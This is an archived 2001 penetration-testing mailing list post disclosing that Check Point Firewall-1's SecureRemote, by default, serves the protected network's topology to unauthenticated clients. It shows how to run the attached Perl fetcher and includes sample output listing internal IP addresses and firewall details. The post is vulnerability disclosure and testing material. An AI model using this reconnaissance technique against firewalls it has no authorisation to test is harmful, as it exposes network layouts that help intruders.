Penetration Testing mailing list archives

Firewall-1 Information leak

From: Haroon Meer <haroon () sensepost com>
Date: Wed, 18 Jul 2001 03:17:10 +0200 (SAST)

Hi.

Checkpoint Firewall-1 makes use of a piece of software called SecureRemote
to create encrypted sessions between users and FW-1 modules. Before remote
users are able to communicate with internal hosts, a network topology of
the protected network is downloaded to the client. While newer versions of
the FW-1 software have the ability to restrict these downloads to only
authenticated sessions, the default setting allows unauthenticated
requests to be honoured. This gives a potential attacker a wealth of
information including ip addresses, network masks (and even friendly
descriptions)

The attached file will connect to the firewall, and download the
toplogy (if SecureRemote is running)
(it is a tiny perl file, which needs only Socket, so avoids the hassle of
having to install the SecureRemote client <or booting windows> to test a
firewall-1) 

--snip--
SensePost# perl sr.pl firewall.victim.com
Testing  on port 256
        :val (
                :reply (
                        : (-SensePost-dotcom-.USKO_hal9000-196.3.167.186
                                :type (gateway)
                                :is_fwz (true)
                                :is_isakmp (true)
                                :certificates ()
                                :uencapport (2746)
                                :fwver (4.1)
                                :ipaddr (196.3.167.186)
                                :ipmask (255.255.255.255)
                                :resolve_multiple_interfaces ()
                                :ifaddrs (
                                        : (196.3.167.186)
                                        : (172.20.240.1)
                                        : (196.3.170.1)
                                        : (209.203.37.97)
                                )
                                :firewall (installed)
                                :location (external)
                                :keyloc (remote)
                                :userc_crypt_ver (1)
                                :keymanager (
                                        :type (refobj)
                                        :refname ("#_-SensePost-dotcom-")

)                               :name
                                (-SensePost-dotcom-.USKO_Neo196.3.167.189)
                                                :type (gateway)
                                                :ipaddr (172.29.0.1)
                                                :ipmask (255.255.255.255)
                                        )
        
--snip-- 

Haroon Meer
+27 837866637
haroon () sensepost com
http://www.sensepost.com

Attachment: sr.pl
Description:

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

Current thread:

Firewall-1 Information leak Haroon Meer (Jul 18)